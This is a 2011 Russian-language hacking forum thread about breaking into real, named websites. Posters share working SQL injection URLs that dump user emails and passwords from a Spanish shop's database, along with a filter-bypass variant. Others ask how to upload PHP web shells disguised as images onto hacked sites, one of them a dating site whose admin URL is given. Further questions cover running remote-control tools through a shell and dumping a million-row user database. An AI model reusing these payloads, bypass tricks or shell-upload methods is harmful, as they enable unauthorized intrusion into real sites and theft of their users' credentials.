HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.01.2011, 01:12
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию

Так работает:

Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:

Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\
 
Ответить с цитированием

  #2  
Старый 28.01.2011, 01:50
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию

Цитата:
Сообщение от DCrypt  
Так работает:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\
Кажется там from фильтруется.
 
Ответить с цитированием

  #3  
Старый 28.01.2011, 02:27
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
Кажется там from фильтруется.
http://www.exploit-db.com/exploits/16060/

Где?
 
Ответить с цитированием

  #4  
Старый 28.01.2011, 14:03
freezed
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
Провел на форуме:
31258

Репутация: 7
По умолчанию

Цитата:
Сообщение от DCrypt  
http://www.exploit-db.com/exploits/16060/
Где?
а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:

Код:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
 
Ответить с цитированием

  #5  
Старый 28.01.2011, 15:04
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
 
Ответить с цитированием

  #6  
Старый 28.01.2011, 15:25
KandidaT'S
Познающий
Регистрация: 09.07.2010
Сообщений: 58
Провел на форуме:
20602

Репутация: 0
По умолчанию

поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
 
Ответить с цитированием

  #7  
Старый 28.01.2011, 23:04
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
Провел на форуме:
23579

Репутация: -5
По умолчанию

uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586

Safe-mode: ON (secure)

C:\ drwxrwxrwx

(это пхп шелл)

Можно как-то запускать радмин или что-то?
 
Ответить с цитированием

  #8  
Старый 29.01.2011, 01:07
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Цитата:
Сообщение от KandidaT'S  
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
Нереал так подсказать.

В админке есть залив файлов?

Цитата:
Сообщение от noviyuser  
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
Тулза от Пашкелы вроде умеет.
 
Ответить с цитированием

  #9  
Старый 29.01.2011, 08:26
KandidaT'S
Познающий
Регистрация: 09.07.2010
Сообщений: 58
Провел на форуме:
20602

Репутация: 0
По умолчанию

заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название
 
Ответить с цитированием

  #10  
Старый 29.01.2011, 09:28
Dagger
Новичок
Регистрация: 07.10.2010
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Вопрос простой-заливаю шелл в картинку при помощи Notepad, затем ставлю её в датинге как основное фото(админом не спалилось) .Далее копирую урл картинки и шелл нифига не открывается- почему? Заливаю как shell.php.jpg. Shell.jpg.php не прокатывает. Может какой другой прогой шелл в картинку вливать? Если делать просто шелл без изображения т.е. просто конвертировать название шелла- то вообще не прокатывает.

http://okfreedating.net/static/i/1/10/A8/t_u594088_399_shell.php.jpg либо так http://okfreedating.net/photo.php?user_id=594088&album_id=1&current=0 , а шелл не открывается-(((

И ещё. Зная на взломанном сайте таблицы,номера колонок и т.д.,т.е. полный путь до нужной базы,но опять же без админки, чем сдампить эту базу? Пытался сдампить Havij 1.14, но слишком долго-база миллионник-)

ICQ 620198086

http://admin.okfreedating.net/login.php- админка

профиль где залит шелл: vlamalijj@Fdfnfh

И ещё- как получить пароль админа? Просьба не пинать-) Учусь
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.